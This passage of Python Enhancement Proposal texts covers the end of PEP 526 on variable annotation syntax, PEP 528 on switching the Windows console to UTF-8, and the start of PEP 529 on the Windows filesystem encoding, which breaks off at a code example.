t: Tuple[int, ...] = 1, 2, 3 # This only works in Python 3.8+
# Tuple unpacking with variable annotation syntax
header: str
kind: int
body: Optional[List[str]]
header, kind, body = message
Omitting the initial value leaves the variable uninitialized:
a: int
print(a) # raises NameError
However, annotating a local variable will cause the interpreter to always make
it a local:
def f():
    a: int
    print(a)  # raises UnboundLocalError
    # Commenting out the a: int makes it a NameError.
as if the code were:
def f():
    if False: a = 0
    print(a)  # raises UnboundLocalError
Duplicate type annotations will be ignored. However, static type
checkers may issue a warning for annotations of the same variable
by a different type:
a: int
a: str # Static type checker may or may not warn about this.
Class and instance variable annotations
Type annotations can also be used to annotate class and instance variables
in class bodies and methods. In particular, the value-less notation a: int
allows one to annotate instance variables that should be initialized
in __init__ or __new__. The proposed syntax is as follows:
class BasicStarship:
    captain: str = 'Picard'               # instance variable with default
    damage: int                           # instance variable without default
    stats: ClassVar[Dict[str, int]] = {}  # class variable
Here ClassVar is a special class defined by the typing module that
indicates to the static type checker that this variable should not be
set on instances.
Note that a ClassVar parameter cannot include any type variables, regardless
of the level of nesting: ClassVar[T] and ClassVar[List[Set[T]]] are
both invalid if T is a type variable.
This could be illustrated with a more detailed example. In this class:
class Starship:
    captain = 'Picard'
    stats = {}
    def __init__(self, damage, captain=None):
        self.damage = damage
        if captain:
            self.captain = captain  # Else keep the default
    def hit(self):
        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
stats is intended to be a class variable (keeping track of many different
per-game statistics), while captain is an instance variable with a default
value set in the class. This difference might not be seen by a type
checker: both get initialized in the class, but captain serves only
as a convenient default value for the instance variable, while stats
is truly a class variable – it is intended to be shared by all instances.
Since both variables happen to be initialized at the class level, it is
useful to distinguish them by marking class variables as annotated with
types wrapped in ClassVar[...]. In this way a type checker may flag
accidental assignments to attributes with the same name on instances.
For example, annotating the discussed class:
class Starship:
    captain: str = 'Picard'
    damage: int
    stats: ClassVar[Dict[str, int]] = {}
    def __init__(self, damage: int, captain: str = None):
        self.damage = damage
        if captain:
            self.captain = captain  # Else keep the default
    def hit(self):
        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
enterprise_d = Starship(3000)
enterprise_d.stats = {}  # Flagged as error by a type checker
Starship.stats = {}      # This is OK
As a matter of convenience (and convention), instance variables can be
annotated in __init__ or other methods, rather than in the class:
from typing import Generic, TypeVar
T = TypeVar('T')
class Box(Generic[T]):
    def __init__(self, content):
        self.content: T = content
Annotating expressions
The target of the annotation can be any valid single assignment
target, at least syntactically (it is up to the type checker what to
do with this):
class Cls:
pass
c = Cls()
c.x: int = 0 # Annotates c.x with int.
c.y: int # Annotates c.y with int.
d = {}
d['a']: int = 0 # Annotates d['a'] with int.
d['b']: int # Annotates d['b'] with int.
Note that even a parenthesized name is considered an expression,
not a simple name:
(x): int # Annotates x with int, (x) treated as expression by compiler.
(y): int = 0 # Same situation here.
Where annotations aren’t allowed
It is illegal to attempt to annotate variables subject to global
or nonlocal in the same function scope:
def f():
    global x: int  # SyntaxError
def g():
    x: int         # Also a SyntaxError
    global x
The reason is that global and nonlocal don’t own variables;
therefore, the type annotations belong in the scope owning the variable.
Only single assignment targets and single right hand side values are allowed.
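For instance (an illustrative sketch, not taken from the reference
implementation):
x: int = 1          # OK: single target, single right hand side value
x: int = y = 1      # SyntaxError: chained assignment cannot be annotated
x, y: int = 1, 2    # SyntaxError: multiple targets cannot be annotated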
In addition, one cannot annotate variables used in a for or with
statement; they can be annotated ahead of time, in a similar manner to tuple
unpacking:
a: int
for a in my_iter:
...
f: MyFile
with myfunc() as f:
...
Variable annotations in stub files
As variable annotations are more readable than type comments, they are
preferred in stub files for all versions of Python, including Python 2.7.
Note that stub files are not executed by Python interpreters, and therefore
using variable annotations will not lead to errors. Type checkers should
support variable annotations in stubs for all versions of Python. For example:
# file lib.pyi
ADDRESS: unicode = ...
class Error:
cause: Union[str, unicode]
Preferred coding style for variable annotations
Annotations for module level variables, class and instance variables,
and local variables should have a single space after corresponding colon.
There should be no space before the colon. If an assignment has a right hand
side, then the equality sign should have exactly one space on both sides.
Examples:
Yes:
code: int
class Point:
    coords: Tuple[int, int]
    label: str = '<unknown>'
No:
code:int  # No space after colon
code : int  # Space before colon
class Test:
    result: int=0  # No spaces around equality sign
Changes to Standard Library and Documentation
A new covariant type ClassVar[T_co] is added to the typing
module. It accepts only a single argument that should be a valid type,
and is used to annotate class variables that should not be set on class
instances. This restriction is ensured by static checkers,
but not at runtime. See the
classvar section for examples and explanations for the usage of
ClassVar, and see the rejected section
for more information on the reasoning behind ClassVar.
Function get_type_hints in the typing module will be extended,
so that one can retrieve type annotations at runtime from modules
and classes as well as functions.
Annotations are returned as a dictionary mapping from variable or arguments
to their type hints with forward references evaluated.
For classes it returns a mapping (perhaps collections.ChainMap)
constructed from annotations in method resolution order.
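For example, a minimal sketch of the extended behaviour (the class names are
illustrative and not part of the specification):
from typing import get_type_hints
class Base:
    x: int
class Derived(Base):
    y: str
# Hints are gathered along the method resolution order, so annotations
# from Base and Derived are merged:
assert get_type_hints(Derived) == {'x': int, 'y': str}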
Recommended guidelines for using annotations will be added to the
documentation, containing a pedagogical recapitulation of specifications
described in this PEP and in PEP 484. In addition, a helper script for
translating type comments into type annotations will be published
separately from the standard library.
Runtime Effects of Type Annotations
Annotating a local variable will cause
the interpreter to treat it as a local, even if it was never assigned to.
Annotations for local variables will not be evaluated:
def f():
x: NonexistentName # No error.
However, if it is at a module or class level, then the type will be
evaluated:
x: NonexistentName # Error!
class X:
var: NonexistentName # Error!
In addition, at the module or class level, if the item being annotated is a
simple name, then it and the annotation will be stored in the
__annotations__ attribute of that module or class (mangled if private)
as an ordered mapping from names to evaluated annotations.
Here is an example:
from typing import Dict
class Player:
...
players: Dict[str, Player]
__points: int
print(__annotations__)
# prints: {'players': typing.Dict[str, __main__.Player],
# '_Player__points': <class 'int'>}
__annotations__ is writable, so this is permitted:
__annotations__['s'] = str
But attempting to update __annotations__ to something other than an
ordered mapping may result in a TypeError:
class C:
__annotations__ = 42
x: int = 5 # raises TypeError
(Note that the assignment to __annotations__, which is the
culprit, is accepted by the Python interpreter without questioning it
– but the subsequent type annotation expects it to be a
MutableMapping and will fail.)
The recommended way of getting annotations at runtime is by using
typing.get_type_hints function; as with all dunder attributes,
any undocumented use of __annotations__ is subject to breakage
without warning:
from typing import Dict, ClassVar, get_type_hints
class Starship:
    hitpoints: int = 50
    stats: ClassVar[Dict[str, int]] = {}
    shield: int = 100
    captain: str
    def __init__(self, captain: str) -> None:
        ...
assert get_type_hints(Starship) == {'hitpoints': int,
                                    'stats': ClassVar[Dict[str, int]],
                                    'shield': int,
                                    'captain': str}
assert get_type_hints(Starship.__init__) == {'captain': str,
                                             'return': None}
Note that if annotations are not found statically, then the
__annotations__ dictionary is not created at all. Also the
value of having annotations available locally does not offset
the cost of having to create and populate the annotations dictionary
on every function call. Therefore, annotations at function level are
not evaluated and not stored.
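A short sketch of the observable effect (illustrative only):
def f():
    x: NonexistentName  # neither evaluated nor stored
f()  # runs fine; the local annotation is simply ignored
assert 'x' not in f.__annotations__  # only parameter/return hints live here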
Other uses of annotations
While Python with this PEP will not object to:
alice: 'well done' = 'A+'
bob: 'what a shame' = 'F-'
since it will not care about the type annotation beyond “it evaluates
without raising”, a type checker that encounters it will flag it,
unless disabled with # type: ignore or @no_type_check.
However, since Python won’t care what the “type” is,
if the above snippet is at the global level or in a class, __annotations__
will include {'alice': 'well done', 'bob': 'what a shame'}.
These stored annotations might be used for other purposes,
but with this PEP we explicitly recommend type hinting as the
preferred use of annotations.
Rejected/Postponed Proposals
Should we introduce variable annotations at all?
Variable annotations have already been around for almost two years
in the form of type comments, sanctioned by PEP 484. They are
extensively used by third party type checkers (mypy, pytype,
PyCharm, etc.) and by projects using the type checkers. However, the
comment syntax has many downsides listed in Rationale. This PEP is
not about the need for type annotations, it is about what should be
the syntax for such annotations.
Introduce a new keyword:
The choice of a good keyword is hard,
e.g. it can’t be var because that is way too common a variable name,
and it can’t be local if we want to use it for class variables or
globals. Second, no matter what we choose, we’d still need
a __future__ import.
Use def as a keyword:
The proposal would be:
def primes: List[int] = []
def captain: str
The problem with this is that def means “define a function” to
generations of Python programmers (and tools!), and using it also to
define variables does not increase clarity. (Though this is of
course subjective.)
Use function based syntax:
It was proposed to annotate types of variables using
var = cast(annotation[, value]). Although this syntax
alleviates some problems with type comments like absence of the annotation
in AST, it does not solve other problems such as readability
and it introduces possible runtime overhead.
Allow type annotations for tuple unpacking:
This causes ambiguity: it’s not clear what this statement means:
x, y: T
Are x and y both of type T, or do we expect T to be
a tuple type of two items that are distributed over x and y,
or perhaps x has type Any and y has type T? (The
latter is what this would mean if this occurred in a function
signature.) Rather than leave the (human) reader guessing, we
forbid this, at least for now.
Parenthesized form (var: type) for annotations:
It was brought up on python-ideas as a remedy for the above-mentioned
ambiguity, but it was rejected since such syntax would be hairy,
the benefits are slight, and the readability would be poor.
Allow annotations in chained assignments:
This has problems of ambiguity and readability similar to tuple
unpacking, for example in:
x: int = y = 1
z = w: int = 1
it is ambiguous, what should the types of y and z be?
Also the second line is difficult to parse.
Allow annotations in with and for statement:
This was rejected because in for it would make it hard to spot the actual
iterable, and in with it would confuse CPython’s LL(1) parser.
Evaluate local annotations at function definition time:
This has been rejected by Guido because the placement of the annotation
strongly suggests that it’s in the same scope as the surrounding code.
Store variable annotations also in function scope:
The value of having the annotations available locally is just not enough
to significantly offset the cost of creating and populating the dictionary
on each function call.
Initialize variables annotated without assignment:
It was proposed on python-ideas to initialize x in x: int to
None or to an additional special constant like Javascript’s
undefined. However, adding yet another singleton value to the language
would mean it needed to be checked for everywhere in the code. Therefore,
Guido just said plain “No” to this.
Add also InstanceVar to the typing module:
This is redundant because instance variables are way more common than
class variables. The more common usage deserves to be the default.
Allow instance variable annotations only in methods:
The problem is that many __init__ methods do a lot of things besides
initializing instance variables, and it would be harder (for a human)
to find all the instance variable annotations.
And sometimes __init__ is factored into more helper methods
so it’s even harder to chase them down. Putting the instance variable
annotations together in the class makes it easier to find them,
and helps a first-time reader of the code.
Use syntax x: class t = v for class variables:
This would require a more complicated parser and the class
keyword would confuse simple-minded syntax highlighters. Anyway we
need to have ClassVar store class variables to
__annotations__, so a simpler syntax was chosen.
Forget about ClassVar altogether:
This was proposed since mypy seems to be getting along fine without a way
to distinguish between class and instance variables. But a type checker
can do useful things with the extra information, for example flag
accidental assignments to a class variable via the instance
(which would create an instance variable shadowing the class variable).
It could also flag instance variables with mutable defaults,
a well-known hazard.
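As an illustrative sketch (the Counter class and its attributes are our own example, not taken from the PEP), a checker aware of ClassVar can flag both hazards mentioned above:
from typing import ClassVar, Dict

class Counter:
    per_category: ClassVar[Dict[str, int]] = {}  # mutable default -- a checker may warn
    limit: ClassVar[int] = 100

    def record(self, category: str) -> None:
        self.limit = 50  # a checker can flag this: assignment to a ClassVar via the instance
        self.per_category[category] = self.per_category.get(category, 0) + 1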
Use ClassAttr instead of ClassVar:
The main reason why ClassVar is better is the following: many things are
class attributes, e.g. methods, descriptors, etc. But only specific
attributes are conceptually class variables (or maybe constants).
Do not evaluate annotations, treat them as strings:
This would be inconsistent with the behavior of function annotations that
are always evaluated. Although this might be reconsidered in future,
it was decided in PEP 484 that this would have to be a separate PEP.
Annotate variable types in class docstring:
Many projects already use various docstring conventions, often without
much consistency and generally without conforming to the PEP 484 annotation
syntax yet. Also this would require a special sophisticated parser.
This, in turn, would defeat the purpose of the PEP –
collaborating with the third party type checking tools.
Implement __annotations__ as a descriptor:
This was proposed to prohibit setting __annotations__ to something
non-dictionary or non-None. Guido has rejected this idea as unnecessary;
instead a TypeError will be raised if an attempt is made to update
__annotations__ when it is anything other than a mapping.
Treating bare annotations the same as global or nonlocal:
The rejected proposal would prefer that the presence of an
annotation without assignment in a function body should not involve
any evaluation. In contrast, the PEP implies that if the target
is more complex than a single name, its “left-hand part” should be
evaluated at the point where it occurs in the function body, just to
enforce that it is defined. For example, in this example:
def foo(self):
    slef.name: str
the name slef should be evaluated, just so that if it is not
defined (as is likely in this example :-), the error will be caught
at runtime. This is more in line with what happens when there is
an initial value, and thus is expected to lead to fewer surprises.
(Also note that if the target was self.name (this time correctly
spelled :-), an optimizing compiler has no obligation to evaluate
self as long as it can prove that it will definitely be
defined.)
Backwards Compatibility
This PEP is fully backwards compatible.
Implementation
An implementation for Python 3.6 can be found in a GitHub repo at
https://github.com/ilevkivskyi/cpython/tree/pep-526
Copyright
This document has been placed in the public domain.
PEP 528 – Change Windows console encoding to UTF-8
Author:
Steve Dower <steve.dower at python.org>
Status:
Final
Type:
Standards Track
Created:
27-Aug-2016
Python-Version:
3.6
Post-History:
01-Sep-2016, 04-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Specific Changes
Add _io.WindowsConsoleIO
Add _PyOS_WindowsConsoleReadline
Add legacy mode
Alternative Approaches
Code that may break
Assuming stdin/stdout encoding
Incorrectly using the raw object
Using the raw object with small buffers
Copyright
Abstract
Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page.
This PEP proposes changing the default standard stream implementation on Windows
to use the Unicode APIs. This will allow users to print and input the full range
of Unicode characters at the default Windows console. This also requires a
subtle change to how the tokenizer parses text from readline hooks.
Specific Changes
Add _io.WindowsConsoleIO
Currently an instance of _io.FileIO is used to wrap the file descriptors
representing standard input, output and error. We add a new class (implemented
in C) _io.WindowsConsoleIO that acts as a raw IO object using the Windows
console functions, specifically, ReadConsoleW and WriteConsoleW.
This class will be used when the legacy-mode flag is not in effect, when opening
a standard stream by file descriptor and the stream is a console buffer rather
than a redirected file. Otherwise, _io.FileIO will be used as it is today.
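One way to observe which raw class is in effect (the output below is what one would expect at an interactive Python 3.6 console on Windows; a redirected stream reports _io.FileIO instead):
>>> import sys
>>> type(sys.stdout.buffer.raw)
<class '_io.WindowsConsoleIO'>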
This is a raw (bytes) IO class that requires text to be passed encoded with
utf-8, which will be decoded to utf-16-le and passed to the Windows APIs.
Similarly, bytes read from the class will be provided by the operating system as
utf-16-le and converted into utf-8 when returned to Python.
The use of an ASCII compatible encoding is required to maintain compatibility
with code that bypasses the TextIOWrapper and directly writes ASCII bytes to
the standard streams (for example, Twisted’s process_stdinreader.py). Code that assumes
a particular encoding for the standard streams other than ASCII will likely
break.
Add _PyOS_WindowsConsoleReadline
To allow Unicode entry at the interactive prompt, a new readline hook is
required. The existing PyOS_StdioReadline function will delegate to the new
_PyOS_WindowsConsoleReadline function when reading from a file descriptor
that is a console buffer and the legacy-mode flag is not in effect (the logic
should be identical to above).
Since the readline interface is required to return an 8-bit encoded string with
no embedded nulls, the _PyOS_WindowsConsoleReadline function transcodes from
utf-16-le as read from the operating system into utf-8.
The function PyRun_InteractiveOneObject which currently obtains the encoding
from sys.stdin will select utf-8 unless the legacy-mode flag is in effect.
This may require readline hooks to change their encodings to utf-8, or to
require legacy-mode for correct behaviour.
Add legacy mode
Launching Python with the environment variable PYTHONLEGACYWINDOWSSTDIO set
will enable the legacy-mode flag, which completely restores the previous
behaviour.
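As a sketch, a parent process could opt a child interpreter into legacy mode by setting the variable before launch (the flag is only read at interpreter startup, so it cannot be toggled from within a running process); with the variable set, the child reports the pre-change raw class:
>>> import os, subprocess, sys
>>> env = dict(os.environ, PYTHONLEGACYWINDOWSSTDIO='1')
>>> _ = subprocess.run([sys.executable, '-c',
...                     'import sys; print(type(sys.stdin.buffer.raw))'], env=env)
<class '_io.FileIO'>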
Alternative Approaches
The win_unicode_console package is a pure-Python alternative to changing the
default behaviour of the console. It implements essentially the same
modifications as described here using pure Python code.
Code that may break
The following code patterns may break or see different behaviour as a result of
this change. All of these code samples require explicitly choosing to use a raw
file object in place of a more convenient wrapper that would prevent any visible
change.
Assuming stdin/stdout encoding
Code that assumes that the encoding required by sys.stdin.buffer or
sys.stdout.buffer is 'mbcs' or a more specific encoding may currently be
working by chance, but could encounter issues under this change. For example:
>>> sys.stdout.buffer.write(text.encode('mbcs'))
>>> r = sys.stdin.buffer.read(16).decode('cp437')
To correct this code, the encoding specified on the TextIOWrapper should be
used, either implicitly or explicitly:
>>> # Fix 1: Use wrapper correctly
>>> sys.stdout.write(text)
>>> r = sys.stdin.read(16)
>>> # Fix 2: Use encoding explicitly
>>> sys.stdout.buffer.write(text.encode(sys.stdout.encoding))
>>> r = sys.stdin.buffer.read(16).decode(sys.stdin.encoding)
Incorrectly using the raw object
Code that uses the raw IO object and does not correctly handle partial reads and
writes may be affected. This is particularly important for reads, where the
number of characters read will never exceed one-fourth of the number of bytes
allowed, as there is no feasible way to prevent input from encoding as much
longer utf-8 strings:
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(15)
abcdefghijklm
b'abc'
# data contains at most 3 characters, and never more than 12 bytes
# error, as "defghijklm\r\n" is passed to the interactive prompt
To correct this code, the buffered reader/writer should be used, or the caller
should continue reading until its buffer is full:
>>> # Fix 1: Use the buffered reader/writer
>>> stdin = sys.stdin.buffer
>>> data = stdin.read(15)
abcdefghijklm
b'abcdefghijklm\r\n'
>>> # Fix 2: Loop until enough bytes have been read
>>> raw_stdin = sys.stdin.buffer.raw
>>> b = b''
>>> while len(b) < 15:
...     b += raw_stdin.read(15)
abcdefghijklm
b'abcdefghijklm\r\n'
Using the raw object with small buffers
Code that uses the raw IO object and attempts to read fewer than four bytes
will now receive an error. Because it’s possible that any single character may
require up to four bytes when represented in utf-8, requests must fail:
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(3)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: must read at least 4 bytes
The only workaround is to pass a larger buffer:
>>> # Fix: Request at least four bytes
>>> raw_stdin = sys.stdin.buffer.raw
>>> data = raw_stdin.read(4)
a
b'a'
>>> >>>
(The extra >>> is due to the newline remaining in the input buffer and is
expected in this situation.)
Copyright
This document has been placed in the public domain.
PEP 529 – Change Windows filesystem encoding to UTF-8
Author:
Steve Dower <steve.dower at python.org>
Status:
Final
Type:
Standards Track
Created:
27-Aug-2016
Python-Version:
3.6
Post-History:
01-Sep-2016, 04-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Background
Proposal
Specific Changes
Update sys.getfilesystemencoding
Add sys.getfilesystemencodeerrors
Update path_converter
Remove unused ANSI code
Add legacy mode
Undeprecate bytes paths on Windows
Beta experiment
Affected Modules
Rejected Alternatives
Use strict mbcs decoding
Make bytes paths an error on Windows
Make bytes paths an error on all platforms
Code that may break
Not managing encodings across boundaries
Explicitly using ‘mbcs’
Copyright
Abstract
Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page. See Naming Files, Paths, and Namespaces for
more details.
This PEP proposes changing the default filesystem encoding on Windows to utf-8,
and changing all filesystem functions to use the Unicode APIs for filesystem
paths. This will not affect code that uses strings to represent paths, however
those that use bytes for paths will now be able to correctly round-trip all
valid paths in Windows filesystems. Currently, the conversions between Unicode
(in the OS) and bytes (in Python) are lossy and fail to round-trip
characters outside of the user’s active code page.
Notably, this does not impact the encoding of the contents of files. These will
continue to default to locale.getpreferredencoding() (for text files) or
plain bytes (for binary files). This only affects the encoding used when users
pass a bytes object to Python where it is then passed to the operating system as
a path name.
Background
File system paths are almost universally represented as text with an encoding
determined by the file system. In Python, we expose these paths via a number of
interfaces, such as the os and io modules. Paths may be passed either
direction across these interfaces, that is, from the filesystem to the
application (for example, os.listdir()), or from the application to the
filesystem (for example, os.unlink()).
When paths are passed between the filesystem and the application, they are
either passed through as a bytes blob or converted to/from str using
os.fsencode() and os.fsdecode() or explicit encoding using
sys.getfilesystemencoding(). The result of encoding a string with
sys.getfilesystemencoding() is a blob of bytes in the native format for the
default file system.
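As a concrete illustration (the file name here is arbitrary), the helpers round-trip through the filesystem encoding:
>>> import os
>>> path = 'example.txt'
>>> encoded = os.fsencode(path)   # uses sys.getfilesystemencoding()
>>> os.fsdecode(encoded) == path
True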
On Windows, the native format for the filesystem is utf-16-le. The recommended
platform APIs for accessing the filesystem all accept and return text encoded in
this format. However, prior to Windows NT (and possibly further back), the
native format was a configurable machine option and a separate set of APIs
existed to accept this format. The option (the “active code page”) and these
APIs (the “*A functions”) still exist in recent versions of Windows for
backwards compatibility, though new functionality often only has a utf-16-le API
(the “*W functions”).
In Python, str is recommended because it can correctly round-trip all characters
used in paths (on POSIX with surrogateescape handling; on Windows because str
maps to the native representation). On Windows bytes cannot round-trip all
characters used in paths, as Python internally uses the *A functions and hence
the encoding is “whatever the active code page is”. Since the active code page
cannot represent all Unicode characters, the conversion of a path into bytes can
lose information without warning or any available indication.
As a demonstration of this:
>>> open('test\uAB00.txt', 'wb').close()
>>> import glob
>>> glob.glob('test*')
['test\uab00.txt']
>>> glob.glob(b'test*')
[b'test?.txt']
The Unicode character in the second call to glob has been replaced by a ‘?’,
which means passing the path back into the filesystem will result in a
FileNotFoundError. The same results may be observed with os.listdir() or
any function that matches the return type to the parameter type.
While one user-accessible fix is to use str everywhere, POSIX systems generally
do not suffer from data loss when using bytes exclusively as the bytes are the
canonical representation. Even if the encoding is “incorrect” by some standard,
the file system will still map the bytes back to the file. Making use of this
avoids the cost of decoding and reencoding, such that (theoretically, and only
on POSIX), code such as this may be faster because of the use of b'.'
compared to using '.':
>>> for f in os.listdir(b'.'):
...     os.stat(f)
...
As a result, POSIX-focused library authors prefer to use bytes to represent
paths. For some authors it is also a convenience, as their code may receive
bytes already known to be encoded correctly, while others are attempting to
simplify porting their code from Python 2. However, the correctness assumptions
do not carry over to Windows where Unicode is the canonical representation, and
errors may result. This potential data loss is why the use of bytes paths on
Windows was deprecated in Python 3.3 - all of the above code snippets produce
deprecation warnings on Windows.
Proposal
Currently the default filesystem encoding is ‘mbcs’, which is a meta-encoder
that uses the active code page. However, when bytes are passed to the filesystem
they go through the *A APIs and the operating system handles encoding. In this
case, paths are always encoded using the equivalent of ‘mbcs:replace’ with no
opportunity for Python to override or change this.
This proposal would remove all use of the *A APIs and only ever call the *W
APIs. When Windows returns paths to Python as str, they will be decoded from
utf-16-le and returned as text (in whatever the minimal representation is). When
Python code requests paths as bytes, the paths will be transcoded from
utf-16-le into utf-8 using surrogatepass (Windows does not validate surrogate
pairs, so it is possible to have invalid surrogates in filenames). Equally, when
paths are provided as bytes, they are transcoded from utf-8 into utf-16-le
and passed to the *W APIs.
The use of utf-8 will not be configurable, except for the provision of a
“legacy mode” flag to revert to the previous behaviour.
The surrogateescape error mode does not apply here, as the concern is not
about retaining nonsensical bytes. Any path returned from the operating system
will be valid Unicode, while invalid paths created by the user should raise a
decoding error (currently these would raise OSError or a subclass).
The choice of utf-8 bytes (as opposed to utf-16-le bytes) is to ensure the
ability to round-trip path names and allow basic manipulation (for example,
using the os.path module) when assuming an ASCII-compatible encoding. Using
utf-16-le as the encoding is more pure, but will cause more issues than are
resolved.
This change would also undeprecate the use of bytes paths on Windows. No change
to the semantics of using bytes as a path is required - as before, they must be
encoded with the encoding specified by sys.getfilesystemencoding().
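Under this proposal, the earlier glob demonstration would round-trip instead of substituting a ‘?’ (output sketched for a Windows system with the same test\uAB00.txt file present):
>>> import glob
>>> glob.glob(b'test*')
[b'test\xea\xac\x80.txt']
>>> open(glob.glob(b'test*')[0], 'rb').close()   # no FileNotFoundError; the path round-trips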
Specific Changes
Update sys.getfilesystemencoding
Remove the default value for Py_FileSystemDefaultEncoding and set it in
initfsencoding() to utf-8, or if the legacy-mode switch is enabled to mbcs.
Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and
PyUnicode_EncodeFSDefault() to use the utf-8 codec, or if the legacy-mode
switch is enabled the existing mbcs codec.
Add sys.getfilesystemencodeerrors
As the error mode may now change between surrogatepass and replace,
Python code that manually performs encoding also needs access to the current
error mode. This includes the implementation of os.fsencode() and
os.fsdecode(), which currently assume an error mode based on the codec.
Add a public Py_FileSystemDefaultEncodeErrors, similar to the existing
Py_FileSystemDefaultEncoding. The default value on Windows will be
surrogatepass, or replace in legacy mode. The default value on all other
platforms will be surrogateescape.
Add a public sys.getfilesystemencodeerrors() function that returns the
current error mode.
Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and
PyUnicode_EncodeFSDefault() to use the variable for error mode rather than
constant strings.
Update the implementations of os.fsencode() and os.fsdecode() to use
sys.getfilesystemencodeerrors() instead of assuming the mode.
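After these changes, both values can be queried directly; the results shown are what one would expect on Windows under Python 3.6 (other platforms report 'surrogateescape'):
>>> import sys
>>> sys.getfilesystemencoding()
'utf-8'
>>> sys.getfilesystemencodeerrors()
'surrogatepass'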
Update path_converter
Update the path converter to always decode bytes or buffer objects into text
using PyUnicode_DecodeFSDefaultAndSize().
Change the narrow field from a char* string into a flag that indicates
whether the original object was bytes. This is required for functions that need
to return paths using the same type as was originally provided.
Remove unused ANSI code
Remove all code paths using the narrow field, as these will no longer be
reachable by any caller. These are only used within posixmodule.c. Other
uses of paths should have use of bytes paths replaced with decoding and use of
the *W APIs.
Add legacy mode
Add a legacy mode flag, enabled by the environment variable
PYTHONLEGACYWINDOWSFSENCODING or by a function call to
sys._enablelegacywindowsfsencoding(). The function call can only be
used to enable the flag and should be used by programs as close to
initialization as possible. Legacy mode cannot be disabled while Python is
running.
When this flag is set, the default filesystem encoding is set to mbcs rather
than utf-8, and the error mode is set to replace rather than
surrogatepass. Paths will continue to decode to wide characters and only *W
APIs will be called, however, the bytes passed in and received from Python will
be encoded the same as prior to this change.
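A minimal sketch of opting in programmatically (Windows-only, and the call should be made as early as possible, before any paths have been encoded):
>>> import sys
>>> sys._enablelegacywindowsfsencoding()
>>> sys.getfilesystemencoding()
'mbcs'
>>> sys.getfilesystemencodeerrors()
'replace'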
Undeprecate bytes paths on Windows
Using bytes as paths on Windows is currently deprecated. We would announce that
this is no longer the case, and that paths when encoded as bytes should use
whatever is returned from sys.getfilesystemencoding() rather than the user’s
active code page.
Beta experiment
To assist with determining the impact of this change, we propose applying it to
3.6.0b1 provisionally with the intent being to make a final decision before
3.6.0b4.
During the experiment period, decoding and encoding exception messages will be
expanded to include a link to an active online discussion and encourage
reporting of problems.
If it is decided to revert the functionality for 3.6.0b4, the implementation
change would be to permanently enable the legacy mode flag, change the
environment variable to PYTHONWINDOWSUTF8FSENCODING and function to
sys._enablewindowsutf8fsencoding() to allow enabling the functionality
on a case-by-case basis, as opposed to disabling it.
It is expected that if we cannot feasibly make the change for 3.6 due to
compatibility concerns, it will not be possible to make the change at any later
time in Python 3.x.
Affected Modules
This PEP implicitly includes all modules within the Python standard library that either pass path
names to the operating system, or otherwise use sys.getfilesystemencoding().
As of 3.6.0a4, the following modules require modification:
os
_overlapped
_socket
subprocess
zipimport
The following modules use sys.getfilesystemencoding() but do not need
modification:
gc (already assumes bytes are utf-8)
grp (not compiled for Windows)
http.server (correctly includes codec name with transmitted data)
idlelib.editor (should not be needed; has fallback handling)
nis (not compiled for Windows)
pwd (not compiled for Windows)
spwd (not compiled for Windows)
_ssl (only used for ASCII constants)
tarfile (code unused on Windows)
_tkinter (already assumes bytes are utf-8)
wsgiref (assumed as the default encoding for unknown environments)
zipapp (code unused on Windows)
The following native code uses one of the encoding or decoding functions, but does
not require any modification:
Parser/parsetok.c (docs already specify sys.getfilesystemencoding())
Python/ast.c (docs already specify sys.getfilesystemencoding())
Python/compile.c (undocumented, but Python filesystem encoding implied)
Python/errors.c (docs already specify os.fsdecode())
Python/fileutils.c (code unused on Windows)
Python/future.c (undocumented, but Python filesystem encoding implied)
Python/import.c (docs already specify utf-8)
Python/importdl.c (code unused on Windows)
Python/pythonrun.c (docs already specify sys.getfilesystemencoding())
Python/symtable.c (undocumented, but Python filesystem encoding implied)
Python/thread.c (code unused on Windows)
Python/traceback.c (encodes correctly for comparing strings)
Python/_warnings.c (docs already specify os.fsdecode())
Rejected Alternatives
Use strict mbcs decoding
This is essentially the same as the proposed change, but instead of changing
sys.getfilesystemencoding() to utf-8 it is changed to mbcs (which
dynamically maps to the active code page).
This approach allows the use of new functionality that is only available as *W
APIs and also detection of encoding/decoding errors. For example, rather than
silently replacing Unicode characters with ‘?’, it would be possible to warn or
fail the operation.
Compared to the proposed fix, this could enable some new functionality but does
not fix any of the problems described initially. New runtime errors may cause
some problems to be more obvious and lead to fixes, provided library maintainers
are interested in supporting Windows and adding a separate code path to treat
filesystem paths as strings.
Making the encoding mbcs without strict errors is equivalent to the legacy-mode
switch being enabled by default. This is a possible course of action if there is
significant breakage of actual code and a need to extend the deprecation period,
but still a desire to have the simplifications to the CPython source.
Make bytes paths an error on Windows
By preventing the use of bytes paths on Windows completely we prevent users from
hitting encoding issues.
However, the motivation for this PEP is to increase the likelihood that code
written on POSIX will also work correctly on Windows. This alternative would
move the other direction and make such code completely incompatible. As this
does not benefit users in any way, we reject it.
Make bytes paths an error on all platforms
By deprecating and then disabling the use of bytes paths on all platforms we
prevent users from hitting encoding issues regardless of where the code was
originally written. This would require a full deprecation cycle, as there are
currently no warnings on platforms other than Windows.
This is likely to be seen as a hostile action against Python developers in
general, and as such is rejected at this time.
Code that may break
The following code patterns may break or see different behaviour as a result of
this change. Each of these examples would have been fragile in code intended for
cross-platform use. The suggested fixes demonstrate the most compatible way to
handle path encoding issues across all platforms and across multiple Python
versions.
Note that all of these examples produce deprecation warnings on Python 3.3 and
later.
Not managing encodings across boundaries
Code that does not manage encodings when crossing protocol boundaries may
currently be working by chance, but could encounter issues when either encoding
changes. Note that the source of filename may be any function that returns
a bytes object, as illustrated in a second example below:
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
